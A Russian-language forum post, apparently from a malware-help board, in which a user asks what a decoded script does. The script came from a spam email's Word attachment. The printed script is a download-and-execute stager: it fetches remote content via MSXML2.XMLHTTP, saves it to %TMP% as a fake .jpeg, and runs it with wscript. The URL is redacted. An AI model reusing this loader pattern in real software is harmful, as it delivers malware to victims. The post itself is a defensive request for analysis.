Показано с 1 по 1 из 1.

Прошу объяснения

  1. #1
    Junior Member Репутация
    Регистрация
    11.11.2016
    Сообщений
    1
    Вес репутации
    11

    Прошу объяснения

    День добрый, не знал куда запостить, нас тут спам аттаковал с письмами, а во вложении *.doc файл, в нем текст и картинка с "замыленным" текстом, в тексте якобы реквизиты, чтобы их посмотреть нужно два раза щелкнуть на эту картинку, я посмотрел внутрь этой картинки лежит в %temp% файл *.cmd в нем закодированный скрипт, я его раскодировал:

    Код HTML:
    :: 58ML2.XML\x@ECHO offset eval=eval(u.ResponseText):: 58ML2.XML\xcmd.exe /c echo var _0x4b4b=['MSXML2.XMLHTTP','GET','тут некий сайт','open','send'];var u= new ActiveXObject(_0x4b4b[0]);u[_0x4b4b[3]](_0x4b4b[1],_0x4b4b[2],0);u[_0x4b4b[4]]();%eval% > "%TMP%\dyno.jpeg":: 2Fconfstart wscript //B //E:jscript "%TMP%\dyno.jpeg"
    Хотелось бы чтобы кто-нибудь объяснил, что он выполняет

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

Похожие темы

  1. Ответов: 9
    Последнее сообщение: 03.11.2015, 20:14
  2. Help прошу
    От BopoH666 в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 06.11.2011, 19:57
  3. Очень прошу вас.
    От Элла Реддл в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 24.02.2011, 15:59
  4. Прошу совета
    От Glazik в разделе Помогите!
    Ответов: 9
    Последнее сообщение: 23.02.2009, 13:06

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01005 seconds with 18 queries